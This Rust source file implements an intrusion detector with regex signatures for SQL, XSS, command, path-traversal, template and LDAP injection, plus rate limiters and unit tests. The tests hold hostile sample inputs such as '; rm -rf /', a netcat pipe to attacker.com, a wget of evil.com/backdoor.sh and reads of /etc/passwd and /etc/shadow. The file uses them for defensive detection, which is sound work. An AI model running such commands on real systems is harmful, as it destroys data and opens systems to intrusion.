use super::events::{AttackPattern, EventCategory, SecurityEvent, SecuritySeverity};
use regex::Regex;
use std::collections::HashMap;
use std::sync::Arc;
use thiserror::Error;
#[derive(Debug, Error)]
pub enum DetectionError {
#[error("Pattern compilation failed: {0}")]
PatternCompilationFailed(String),
#[error("Detection failed: {0}")]
DetectionFailed(String),
}
/// Regex-based classifier that maps raw input to the first matching [`AttackPattern`].
///
/// Each field holds the compiled signatures for one attack category. Build it with
/// [`PatternMatcher::new`].
#[derive(Debug)]
pub struct PatternMatcher {
    /// SQL injection signatures.
    sql_patterns: Vec<Regex>,
    /// Cross-site scripting signatures.
    xss_patterns: Vec<Regex>,
    /// Shell command injection signatures.
    command_patterns: Vec<Regex>,
    /// Path traversal signatures.
    path_patterns: Vec<Regex>,
    /// Server-side template injection signatures.
    template_patterns: Vec<Regex>,
    /// LDAP filter injection signatures.
    ldap_patterns: Vec<Regex>,
}
impl PatternMatcher {
pub fn new() -> Result<Self, DetectionError> {
Ok(Self {
sql_patterns: Self::compile_sql_patterns()?,
xss_patterns: Self::compile_xss_patterns()?,
command_patterns: Self::compile_command_patterns()?,
path_patterns: Self::compile_path_patterns()?,
template_patterns: Self::compile_template_patterns()?,
ldap_patterns: Self::compile_ldap_patterns()?,
})
}
pub fn detect(&self, input: &str) -> AttackPattern {
if self.is_sql_injection(input) {
return AttackPattern::SqlInjection;
}
if self.is_xss(input) {
return AttackPattern::Xss;
}
if self.is_command_injection(input) {
return AttackPattern::CommandInjection;
}
if self.is_path_traversal(input) {
return AttackPattern::PathTraversal;
}
if self.is_template_injection(input) {
return AttackPattern::TemplateInjection;
}
if self.is_ldap_injection(input) {
return AttackPattern::LdapInjection;
}
AttackPattern::None
}
fn is_sql_injection(&self, input: &str) -> bool {
let lower = input.to_lowercase();
self.sql_patterns
.iter()
.any(|pattern| pattern.is_match(&lower))
}
fn is_xss(&self, input: &str) -> bool {
let lower = input.to_lowercase();
self.xss_patterns
.iter()
.any(|pattern| pattern.is_match(&lower))
}
fn is_command_injection(&self, input: &str) -> bool {
self.command_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_path_traversal(&self, input: &str) -> bool {
self.path_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_template_injection(&self, input: &str) -> bool {
self.template_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn is_ldap_injection(&self, input: &str) -> bool {
self.ldap_patterns
.iter()
.any(|pattern| pattern.is_match(input))
}
fn compile_sql_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"(\bor\b|\band\b).*=.*",
r"union.*select",
r"select.*from",
r"insert.*into",
r"delete.*from",
r"drop.*table",
r"update.*set",
r"--.*$",
r"/\*.*\*/",
r";\s*drop",
r"'.*or.*'.*'",
r"'.*=.*'",
r"1.*=.*1",
r"admin.*--",
];
Self::compile_patterns(&patterns)
}
fn compile_xss_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"<script[^>]*>",
r"javascript:",
r"onerror\s*=",
r"onload\s*=",
r"onclick\s*=",
r"<iframe",
r"<embed",
r"<object",
r"document\.cookie",
r"window\.location",
r"eval\s*\(",
r"alert\s*\(",
];
Self::compile_patterns(&patterns)
}
fn compile_command_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r";\s*rm\s",
r";\s*cat\s",
r"\|\s*nc\s",
r"&&\s*wget",
r"`.*`",
r"\$\(.*\)",
r">\s*/dev/",
r"<\s*/dev/",
r";\s*curl",
r"\|\s*sh",
r"\|\s*bash",
];
Self::compile_patterns(&patterns)
}
fn compile_path_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"\.\./",
r"\.\.",
r"%2e%2e",
r"\.\.\\",
r"%252e%252e",
r"..;",
];
Self::compile_patterns(&patterns)
}
fn compile_template_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![r"\{\{.*\}\}", r"\{%.*%\}", r"\$\{.*\}", r"<%.*%>"];
Self::compile_patterns(&patterns)
}
fn compile_ldap_patterns() -> Result<Vec<Regex>, DetectionError> {
let patterns = vec![
r"\*\)",
r"\(\|",
r"\(&",
r"\(objectclass=\*\)",
r"admin\)\(",
];
Self::compile_patterns(&patterns)
}
fn compile_patterns(patterns: &[&str]) -> Result<Vec<Regex>, DetectionError> {
patterns
.iter()
.map(|p| {
Regex::new(p)
.map_err(|e| DetectionError::PatternCompilationFailed(format!("{}: {}", p, e)))
})
.collect()
}
}
impl Default for PatternMatcher {
fn default() -> Self {
match Self::new() {
Ok(matcher) => matcher,
Err(e) => {
log::error!("Failed to initialize default pattern matcher: {}", e);
Self {
sql_patterns: vec![],
xss_patterns: vec![],
command_patterns: vec![],
path_patterns: vec![],
template_patterns: vec![],
ldap_patterns: vec![],
}
}
}
}
}
/// Per-source request counter with fixed time windows.
///
/// Each source gets its own window, which starts at that source's first request. Within a
/// window the source may make at most `max_requests` requests.
#[derive(Debug)]
pub struct RateLimiter {
    /// Counter for each source key, created the first time the source is checked.
    counters: HashMap<String, RequestCounter>,
    /// Requests permitted per source within one window.
    max_requests: usize,
    /// Window length in seconds.
    window_secs: u64,
}
/// Per-source state tracked by the rate limiter.
#[derive(Debug, Clone)]
struct RequestCounter {
    /// Requests recorded since `window_start`, including rejected ones.
    count: usize,
    /// Unix timestamp, in whole seconds, at which the current window began.
    window_start: i64,
}
impl RateLimiter {
pub fn new(max_requests: usize, window_secs: u64) -> Self {
Self {
counters: HashMap::new(),
max_requests,
window_secs,
}
}
pub fn check(&mut self, source: &str) -> bool {
use chrono::Utc;
let now = Utc::now().timestamp();
let counter = self
.counters
.entry(source.to_string())
.or_insert(RequestCounter {
count: 0,
window_start: now,
});
if now - counter.window_start >= self.window_secs as i64 {
counter.count = 0;
counter.window_start = now;
}
counter.count += 1;
counter.count <= self.max_requests
}
pub fn is_limited(&self, source: &str) -> bool {
use chrono::Utc;
let now = Utc::now().timestamp();
if let Some(counter) = self.counters.get(source) {
if now - counter.window_start < self.window_secs as i64 {
return counter.count > self.max_requests;
}
}
false
}
pub fn get_count(&self, source: &str) -> usize {
use chrono::Utc;
let now = Utc::now().timestamp();
self.counters
.get(source)
.filter(|c| now - c.window_start < self.window_secs as i64)
.map(|c| c.count)
.unwrap_or(0)
}
pub fn reset(&mut self, source: &str) {
self.counters.remove(source);
}
pub fn clear(&mut self) {
self.counters.clear();
}
}
/// Combines attack-pattern matching on input with per-source rate limiting of
/// authentication attempts and general requests.
pub struct IntrusionDetector {
    /// Classifier consulted by `analyze_input`; only used through `&self`.
    pattern_matcher: Arc<PatternMatcher>,
    /// Rate limiter for authentication attempts, keyed by source.
    auth_limiter: RateLimiter,
    /// Rate limiter for general requests, keyed by source.
    request_limiter: RateLimiter,
}
impl IntrusionDetector {
pub fn new() -> Result<Self, DetectionError> {
Ok(Self {
pattern_matcher: Arc::new(PatternMatcher::new()?),
auth_limiter: RateLimiter::new(5, 300), request_limiter: RateLimiter::new(100, 60), })
}
pub fn analyze_input(&self, input: &str) -> Option<SecurityEvent> {
let pattern = self.pattern_matcher.detect(input);
if !matches!(pattern, AttackPattern::None) {
Some(SecurityEvent::input_validation_failed(input, pattern))
} else {
None
}
}
pub fn check_auth_rate(&mut self, source: &str) -> Option<SecurityEvent> {
if !self.auth_limiter.check(source) {
Some(
SecurityEvent::new(
SecuritySeverity::High,
EventCategory::Authentication,
format!("Authentication rate limit exceeded for {}", source),
)
.with_attack_pattern(AttackPattern::BruteForce)
.with_metadata("source", source)
.with_metadata("limit_type", "authentication")
.with_success(false),
)
} else {
None
}
}
pub fn check_request_rate(&mut self, source: &str) -> Option<SecurityEvent> {
if !self.request_limiter.check(source) {
Some(
SecurityEvent::new(
SecuritySeverity::Medium,
EventCategory::Network,
format!("Request rate limit exceeded for {}", source),
)
.with_attack_pattern(AttackPattern::DenialOfService)
.with_metadata("source", source)
.with_metadata("limit_type", "request")
.with_success(false),
)
} else {
None
}
}
pub fn get_auth_attempts(&self, source: &str) -> usize {
self.auth_limiter.get_count(source)
}
pub fn reset_auth_attempts(&mut self, source: &str) {
self.auth_limiter.reset(source);
}
}
impl Default for IntrusionDetector {
    /// Builds a detector via [`IntrusionDetector::new`].
    ///
    /// If the attack patterns fail to compile, the error is logged and input analysis falls
    /// back to [`PatternMatcher::default`]. On the same failure that matcher ends up with no
    /// patterns and flags nothing. The rate limits stay identical to `new()` (5 auth attempts
    /// per 300 s, 100 requests per 60 s). A regex failure is no reason to loosen brute-force or
    /// flood protection; the previous fallback silently widened them to 100/60 s and
    /// 1000/60 s.
    fn default() -> Self {
        Self::new().unwrap_or_else(|e| {
            log::error!("Failed to initialize default intrusion detector: {}", e);
            Self {
                pattern_matcher: Arc::new(PatternMatcher::default()),
                auth_limiter: RateLimiter::new(5, 300),
                request_limiter: RateLimiter::new(100, 60),
            }
        })
    }
}
#[cfg(test)]
mod tests {
    use super::*;

    /// Builds a fresh matcher and checks that each input is classified as its paired pattern.
    fn assert_detects(cases: &[(&str, AttackPattern)]) {
        let matcher = PatternMatcher::new().unwrap();
        for (input, expected) in cases {
            assert_eq!(&matcher.detect(input), expected, "input: {:?}", input);
        }
    }

    #[test]
    fn test_sql_injection_detection() {
        assert_detects(&[
            ("SELECT * FROM users", AttackPattern::SqlInjection),
            ("admin' OR '1'='1", AttackPattern::SqlInjection),
            (
                "1 UNION SELECT password FROM users",
                AttackPattern::SqlInjection,
            ),
            ("normal text", AttackPattern::None),
        ]);
    }

    #[test]
    fn test_xss_detection() {
        assert_detects(&[
            ("<script>alert('XSS')</script>", AttackPattern::Xss),
            ("javascript:alert(1)", AttackPattern::Xss),
            ("<img src=x onerror=alert(1)>", AttackPattern::Xss),
        ]);
    }

    #[test]
    fn test_command_injection_detection() {
        assert_detects(&[
            ("; rm -rf /", AttackPattern::CommandInjection),
            ("| nc attacker.com 1234", AttackPattern::CommandInjection),
            ("$(wget evil.com/backdoor.sh)", AttackPattern::CommandInjection),
        ]);
    }

    #[test]
    fn test_path_traversal_detection() {
        assert_detects(&[
            ("../../etc/passwd", AttackPattern::PathTraversal),
            ("..\\..\\windows\\system32", AttackPattern::PathTraversal),
            ("%2e%2e/etc/shadow", AttackPattern::PathTraversal),
        ]);
    }

    #[test]
    fn test_template_injection_detection() {
        assert_detects(&[
            ("{{7*7}}", AttackPattern::TemplateInjection),
            ("${system('whoami')}", AttackPattern::TemplateInjection),
        ]);
    }

    #[test]
    fn test_rate_limiter_basic() {
        let mut limiter = RateLimiter::new(3, 60);
        for _ in 0..3 {
            assert!(limiter.check("user1"));
        }
        assert!(!limiter.check("user1"));
    }

    #[test]
    fn test_rate_limiter_different_sources() {
        let mut limiter = RateLimiter::new(2, 60);
        for source in ["user1", "user2"].iter() {
            assert!(limiter.check(source));
            assert!(limiter.check(source));
            assert!(!limiter.check(source));
        }
    }

    #[test]
    fn test_rate_limiter_is_limited() {
        let mut limiter = RateLimiter::new(2, 60);
        for _ in 0..3 {
            limiter.check("user1");
        }
        assert!(limiter.is_limited("user1"));
        assert!(!limiter.is_limited("user2"));
    }

    #[test]
    fn test_rate_limiter_get_count() {
        let mut limiter = RateLimiter::new(5, 60);
        for _ in 0..3 {
            limiter.check("user1");
        }
        assert_eq!(limiter.get_count("user1"), 3);
        assert_eq!(limiter.get_count("user2"), 0);
    }

    #[test]
    fn test_rate_limiter_reset() {
        let mut limiter = RateLimiter::new(1, 60);
        for _ in 0..2 {
            limiter.check("user1");
        }
        limiter.reset("user1");
        assert!(!limiter.is_limited("user1"));
        assert_eq!(limiter.get_count("user1"), 0);
    }

    #[test]
    fn test_intrusion_detector_analyze_input() {
        let detector = IntrusionDetector::new().unwrap();
        let flagged = detector.analyze_input("SELECT * FROM users");
        let clean = detector.analyze_input("normal text");
        let flagged = flagged.expect("SQL input should produce an event");
        assert_eq!(flagged.attack_pattern, AttackPattern::SqlInjection);
        assert!(clean.is_none());
    }

    #[test]
    fn test_intrusion_detector_auth_rate() {
        let mut detector = IntrusionDetector::new().unwrap();
        let ip = "192.168.1.1";
        for _ in 0..5 {
            detector.check_auth_rate(ip);
        }
        let evt = detector
            .check_auth_rate(ip)
            .expect("sixth attempt should be rate limited");
        assert_eq!(evt.severity, SecuritySeverity::High);
        assert_eq!(evt.attack_pattern, AttackPattern::BruteForce);
    }

    #[test]
    fn test_intrusion_detector_request_rate() {
        let mut detector = IntrusionDetector::new().unwrap();
        let ip = "10.0.0.1";
        for _ in 0..100 {
            detector.check_request_rate(ip);
        }
        let evt = detector
            .check_request_rate(ip)
            .expect("101st request should be rate limited");
        assert_eq!(evt.severity, SecuritySeverity::Medium);
        assert_eq!(evt.attack_pattern, AttackPattern::DenialOfService);
    }
}